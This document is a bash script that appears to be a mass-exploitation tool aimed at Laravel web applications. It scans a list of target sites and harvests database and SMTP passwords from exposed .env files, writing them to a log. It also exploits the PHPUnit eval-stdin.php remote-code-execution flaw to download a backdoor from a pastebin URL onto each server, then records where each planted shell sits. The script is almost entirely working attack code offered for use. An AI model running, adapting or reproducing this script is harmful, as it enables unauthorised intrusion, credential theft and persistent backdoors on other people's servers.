# CEPOTZ MMPPPSSSHHH AHHHH KNTL

#!/bin/bash
# CEPOTZ MMPPPSSSHHH AHHHH KNTL

RD="\e[91m"
GR="\e[92m"
YL="\e[93m"
WH="\e[97m"
BL="\e[94m"
CY="\e[96m"
B="\e[1m"
NC="\e[0m"

rce(){
    # payload='uname -a;curl -skL https://pastebin.com/raw/f4xQX4sL -o cans.php'
    pathz='/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'
    exploit=$(curl -skL --data '<?php echo "Cans21 :".system("uname -a;curl -skL https://pastebin.com/raw/f4xQX4sL -o cans.php").":";?>' "$1/$pathz")
    uname=$(echo $exploit | grep -Po "(?<=Cans21 :)[^:]*")
    if [[ ! -z $uname ]]; then
        rc="${GR}RCE${NC}"
        un="${GR}[*] Kernel : $uname${NC}${NC}"
        if [[ $(curl -s $1/vendor/phpunit/phpunit/src/Util/PHP/cans.php | grep -ic "Cans21") -eq 1 ]]; then
            shell="${GR}[*] Successfully Uploaded : ${CY}$1/vendor/phpunit/phpunit/src/Util/PHP/cans.php${NC}"
            echo "$1/vendor/phpunit/phpunit/src/Util/PHP/cans.php" >> laravel-rce-log.txt
        else
            shell="${RD}[-] Failed Uploading Backdoor${NC}"
        fi
    else
        rc="${RD}RCE${NC}"
    fi
}
env(){
    exploit=$(curl -skL "$1/.env")
    db_host=$(echo $exploit | grep -Po '(?<=DB_HOST=)[^ ]*')
    db=$(echo $exploit | grep -Po '(?<=DB_DATABASE=)[^ ]*')
    db_u=$(echo $exploit | grep -Po '(?<=DB_USERNAME=)[^ ]*')
    db_p=$(echo $exploit | grep -Po '(?<=DB_PASSWORD=)[^ ]*')
    m_host=$(echo $exploit | grep -Po '(?<=MAIL_HOST=)[^ ]*')
    m_port=$(echo $exploit | grep -Po '(?<=MAIL_PORT=)[^ ]*')
    m_u=$(echo $exploit | grep -Po '(?<=MAIL_USERNAME=)[^ ]*')
    m_p=$(echo $exploit | grep -Po '(?<=MAIL_PASSWORD=)[^ ]*')

    if [[ -z $db_host ]]; then
        en="${RD}DB${NC}"
    else
        en="${GR}DB${NC}"
        dbs="${GR}\n    [*] DB_HOST : $db_host\n    [*] DB_DATABASE : $db\n [*] DB_USERNAME : $db_u\n   [*] DB_PASSWORD : $db_p\n${NC}"
        echo "$1 | DATABASE : $db_host | $db | $db_u | $db_p" >> laravel-env-log.txt
        if [[ -z $m_host || $m_host == "null" || $m_host == "localhost" || $m_host == "mailtrap.io" || $m_host == "smtp.mailtrap.io" ]]; then
            sm="${RD}SMTP${NC}"
        else
            sm="${GR}SMTP${NC}"
            smtp="${GR}\n   [*] MAIL_HOST : $m_host\n   [*] MAIL_PORT : $m_port\n   [*] MAIL_USERNAME : $m_u\n  [*] MAIL_PASSWORD : $m_p\n${NC}"
            echo "$1 | SMTP : $m_host | $m_port | $m_u | $m_p" >> laravel-env-log.txt
        fi
    fi
}

exploit(){
    u=$(echo $1 | awk -F/ '{print $3}')
    env $u && rce $u
    echo -e "[$w][$2/$tot] $1 [$en][$sm][$rc]$dbs$smtp$loc"
}

read -p "[?] List Target : " list
if [[ ! -f $list ]]; then
    echo "[-] File $list Not Exist!"
    exit 1
fi

read -p "[?] Threads (Default 10): " thread
if [[ $thread="" ]]; then
    thread=10;
fi

read -p "[?] Delay (Default 1): " sleep
if [[ $sleep="" ]]; then
    sleep=1;
fi

echo
echo -e "[!] ${GR}Target Loaded : ${CY}$(wc -l $list)${NC}"
echo -e "[!] ${GR}Thread : ${CY}$thread${NC}"
echo -e "[!] ${GR}Delay : ${CY}$sleep sec${NC}"
echo -e "[+] ${GR}Start Exploit.......${NC}\n"

hitung=1
IFS=$'\r\n' GLOBIGNORE='*' command eval  'target=($(cat $list))'
for (( i = 0; i <"${#target[@]}"; i++ )); do
    targeto="${target[$i]}"
    ff=$(expr $hitung % $thread)
    if [[ $ff == 0 && $hitung > 0 ]]; then
        sleep $sleep
    fi
    w=$(date '+%H:%M:%S')
    tot=$(cat $list | wc -l)
    exploit $targeto $hitung &
    hitung=$[$hitung+1]
done
wait